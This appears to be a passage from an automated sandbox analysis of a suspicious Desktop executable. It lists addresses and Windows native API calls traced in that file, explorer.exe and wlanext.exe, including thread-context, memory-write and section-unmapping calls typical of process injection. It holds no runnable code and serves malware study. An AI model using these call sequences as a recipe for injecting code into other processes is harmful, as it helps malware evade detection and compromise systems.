          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_01A12D30
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12D10 NtMapViewOfSection,LdrInitializeThunk,3_2_01A12D10
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_01A12CA0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01A12C70
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12FB0 NtResumeThread,LdrInitializeThunk,3_2_01A12FB0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12F90 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01A12F90
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12FE0 NtCreateFile,LdrInitializeThunk,3_2_01A12FE0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12F30 NtCreateSection,LdrInitializeThunk,3_2_01A12F30
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01A12EA0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_01A12E80
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A14340 NtSetContextThread,3_2_01A14340
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A14650 NtSuspendThread,3_2_01A14650
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12BA0 NtEnumerateValueKey,3_2_01A12BA0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12B80 NtQueryInformationFile,3_2_01A12B80
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12BE0 NtQueryValueKey,3_2_01A12BE0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12AB0 NtWaitForSingleObject,3_2_01A12AB0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12AF0 NtWriteFile,3_2_01A12AF0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12DB0 NtEnumerateKey,3_2_01A12DB0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12D00 NtSetInformationFile,3_2_01A12D00
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12CF0 NtOpenProcess,3_2_01A12CF0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12CC0 NtQueryVirtualMemory,3_2_01A12CC0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12C00 NtQueryInformationProcess,3_2_01A12C00
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12C60 NtCreateKey,3_2_01A12C60
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12FA0 NtQuerySection,3_2_01A12FA0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12F60 NtCreateProcessEx,3_2_01A12F60
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12EE0 NtQueueApcThread,3_2_01A12EE0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A12E30 NtWriteVirtualMemory,3_2_01A12E30
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A13090 NtSetValueKey,3_2_01A13090
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A13010 NtOpenDirectoryObject,3_2_01A13010
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A135C0 NtCreateMutant,3_2_01A135C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A139B0 NtGetContextThread,3_2_01A139B0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A13D10 NtOpenProcessToken,3_2_01A13D10
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A13D70 NtOpenThread,3_2_01A13D70
          Source: C:\Windows\explorer.exeCode function: 4_2_107D8232 NtCreateFile,4_2_107D8232
          Source: C:\Windows\explorer.exeCode function: 4_2_107D9E12 NtProtectVirtualMemory,4_2_107D9E12
          Source: C:\Windows\explorer.exeCode function: 4_2_107D9E0A NtProtectVirtualMemory,4_2_107D9E0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00FEF267 CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,5_2_00FEF267
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632B60 NtClose,LdrInitializeThunk,5_2_03632B60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632BE0 NtQueryValueKey,LdrInitializeThunk,5_2_03632BE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03632BF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632AD0 NtReadFile,LdrInitializeThunk,5_2_03632AD0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632F30 NtCreateSection,LdrInitializeThunk,5_2_03632F30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632FE0 NtCreateFile,LdrInitializeThunk,5_2_03632FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_03632EA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632D10 NtMapViewOfSection,LdrInitializeThunk,5_2_03632D10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03632DF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632DD0 NtDelayExecution,LdrInitializeThunk,5_2_03632DD0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632C60 NtCreateKey,LdrInitializeThunk,5_2_03632C60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03632C70
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_03632CA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036335C0 NtCreateMutant,LdrInitializeThunk,5_2_036335C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03634340 NtSetContextThread,5_2_03634340
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03634650 NtSuspendThread,5_2_03634650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632BA0 NtEnumerateValueKey,5_2_03632BA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632B80 NtQueryInformationFile,5_2_03632B80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632AF0 NtWriteFile,5_2_03632AF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632AB0 NtWaitForSingleObject,5_2_03632AB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632F60 NtCreateProcessEx,5_2_03632F60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632FA0 NtQuerySection,5_2_03632FA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632FB0 NtResumeThread,5_2_03632FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632F90 NtProtectVirtualMemory,5_2_03632F90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632E30 NtWriteVirtualMemory,5_2_03632E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632EE0 NtQueueApcThread,5_2_03632EE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632E80 NtReadVirtualMemory,5_2_03632E80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632D30 NtUnmapViewOfSection,5_2_03632D30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632D00 NtSetInformationFile,5_2_03632D00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632DB0 NtEnumerateKey,5_2_03632DB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632C00 NtQueryInformationProcess,5_2_03632C00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632CF0 NtOpenProcess,5_2_03632CF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03632CC0 NtQueryVirtualMemory,5_2_03632CC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03633010 NtOpenDirectoryObject,5_2_03633010
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03633090 NtSetValueKey,5_2_03633090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036339B0 NtGetContextThread,5_2_036339B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03633D70 NtOpenThread,5_2_03633D70
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03633D10 NtOpenProcessToken,5_2_03633D10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BCA360 NtCreateFile,5_2_00BCA360
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BCA490 NtClose,5_2_00BCA490
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BCA410 NtReadFile,5_2_00BCA410
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BCA540 NtAllocateVirtualMemory,5_2_00BCA540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BCA48C NtClose,5_2_00BCA48C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BCA40A NtReadFile,5_2_00BCA40A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BCA53D NtAllocateVirtualMemory,5_2_00BCA53D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_034A9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,5_2_034A9BAF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_034AA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,5_2_034AA036
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_034A9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_034A9BB2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_034AA042 NtQueryInformationProcess,5_2_034AA042
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00FEF267: CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,5_2_00FEF267
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 0_2_013CDC740_2_013CDC74
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 0_2_05246DB00_2_05246DB0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 0_2_052400060_2_05240006
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 0_2_052400400_2_05240040
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 0_2_05246D500_2_05246D50
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 0_2_076667A80_2_076667A8
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 0_2_076663700_2_07666370
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 0_2_07662F200_2_07662F20
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 0_2_07665F380_2_07665F38
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 0_2_07667E500_2_07667E50
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 0_2_07665B000_2_07665B00
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041E1403_2_0041E140
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_004012FB3_2_004012FB
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041ECC13_2_0041ECC1
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041DDC23_2_0041DDC2
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_00402D873_2_00402D87
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041D5A63_2_0041D5A6
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_00409E603_2_00409E60
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_0041EEF43_2_0041EEF4
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA01AA3_2_01AA01AA
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A941A23_2_01A941A2
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A981CC3_2_01A981CC
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D01003_2_019D0100
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7A1183_2_01A7A118
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A681583_2_01A68158
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A720003_2_01A72000
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA03E63_2_01AA03E6
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019EE3F03_2_019EE3F0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9A3523_2_01A9A352
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A602C03_2_01A602C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A802743_2_01A80274
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA05913_2_01AA0591
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E05353_2_019E0535
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A8E4F63_2_01A8E4F6
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A844203_2_01A84420
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A924463_2_01A92446
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DC7C03_2_019DC7C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E07703_2_019E0770
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A047503_2_01A04750
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FC6E03_2_019FC6E0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AAA9A63_2_01AAA9A6
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E29A03_2_019E29A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F69623_2_019F6962
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019C68B83_2_019C68B8
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0E8F03_2_01A0E8F0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E28403_2_019E2840
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019EA8403_2_019EA840
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A96BD73_2_01A96BD7
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9AB403_2_01A9AB40
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DEA803_2_019DEA80
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F8DBF3_2_019F8DBF
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DADE03_2_019DADE0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019EAD003_2_019EAD00
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7CD1F3_2_01A7CD1F
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A80CB53_2_01A80CB5
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D0CF23_2_019D0CF2
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0C003_2_019E0C00
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A5EFA03_2_01A5EFA0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D2FC83_2_019D2FC8
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019ECFE03_2_019ECFE0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A22F283_2_01A22F28
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A00F303_2_01A00F30
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A82F303_2_01A82F30
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A54F403_2_01A54F40
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F2E903_2_019F2E90
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9CE933_2_01A9CE93
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9EEDB3_2_01A9EEDB
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9EE263_2_01A9EE26
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E0E593_2_019E0E59
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019EB1B03_2_019EB1B0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AAB16B3_2_01AAB16B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A1516C3_2_01A1516C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CF1723_2_019CF172
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A970E93_2_01A970E9
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9F0E03_2_01A9F0E0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E70C03_2_019E70C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A8F0CC3_2_01A8F0CC
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A2739A3_2_01A2739A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9132D3_2_01A9132D
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CD34C3_2_019CD34C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E52A03_2_019E52A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A812ED3_2_01A812ED
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FB2C03_2_019FB2C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7D5B03_2_01A7D5B0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA95C33_2_01AA95C3
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A975713_2_01A97571
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9F43F3_2_01A9F43F
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D14603_2_019D1460
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9F7B03_2_01A9F7B0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A916CC3_2_01A916CC
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A256303_2_01A25630
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A759103_2_01A75910
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E99503_2_019E9950
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FB9503_2_019FB950
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E38E03_2_019E38E0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A4D8003_2_01A4D800
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FFB803_2_019FFB80
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A55BF03_2_01A55BF0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A1DBF93_2_01A1DBF9
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9FB763_2_01A9FB76
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A25AA03_2_01A25AA0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7DAAC3_2_01A7DAAC
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A81AA33_2_01A81AA3
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A8DAC63_2_01A8DAC6
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A53A6C3_2_01A53A6C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9FA493_2_01A9FA49
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A97A463_2_01A97A46
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FFDC03_2_019FFDC0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A97D733_2_01A97D73
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E3D403_2_019E3D40
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A91D5A3_2_01A91D5A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9FCF23_2_01A9FCF2
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A59C323_2_01A59C32
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E1F923_2_019E1F92
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9FFB13_2_01A9FFB1
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019A3FD23_2_019A3FD2
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019A3FD53_2_019A3FD5
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A9FF093_2_01A9FF09
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E9EB03_2_019E9EB0
          Source: C:\Windows\explorer.exeCode function: 4_2_0E77A2324_2_0E77A232
          Source: C:\Windows\explorer.exeCode function: 4_2_0E774B324_2_0E774B32
          Source: C:\Windows\explorer.exeCode function: 4_2_0E774B304_2_0E774B30
          Source: C:\Windows\explorer.exeCode function: 4_2_0E7790364_2_0E779036
          Source: C:\Windows\explorer.exeCode function: 4_2_0E7700824_2_0E770082
          Source: C:\Windows\explorer.exeCode function: 4_2_0E7779124_2_0E777912
          Source: C:\Windows\explorer.exeCode function: 4_2_0E771D024_2_0E771D02
          Source: C:\Windows\explorer.exeCode function: 4_2_0E77D5CD4_2_0E77D5CD
          Source: C:\Windows\explorer.exeCode function: 4_2_107D82324_2_107D8232
          Source: C:\Windows\explorer.exeCode function: 4_2_107D70364_2_107D7036
          Source: C:\Windows\explorer.exeCode function: 4_2_107CE0824_2_107CE082
          Source: C:\Windows\explorer.exeCode function: 4_2_107D2B304_2_107D2B30
          Source: C:\Windows\explorer.exeCode function: 4_2_107D2B324_2_107D2B32
          Source: C:\Windows\explorer.exeCode function: 4_2_107D59124_2_107D5912
          Source: C:\Windows\explorer.exeCode function: 4_2_107CFD024_2_107CFD02
          Source: C:\Windows\explorer.exeCode function: 4_2_107DB5CD4_2_107DB5CD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036BA3525_2_036BA352
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036C03E65_2_036C03E6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0360E3F05_2_0360E3F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036A02745_2_036A0274
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036802C05_2_036802C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036881585_2_03688158
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_035F01005_2_035F0100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0369A1185_2_0369A118
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036B81CC5_2_036B81CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036C01AA5_2_036C01AA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036B41A25_2_036B41A2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036920005_2_03692000
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036007705_2_03600770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036247505_2_03624750
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_035FC7C05_2_035FC7C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0361C6E05_2_0361C6E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036005355_2_03600535
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036C05915_2_036C0591
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036B24465_2_036B2446
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036A44205_2_036A4420
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036AE4F65_2_036AE4F6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036BAB405_2_036BAB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036B6BD75_2_036B6BD7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_035FEA805_2_035FEA80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036169625_2_03616962
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036029A05_2_036029A0
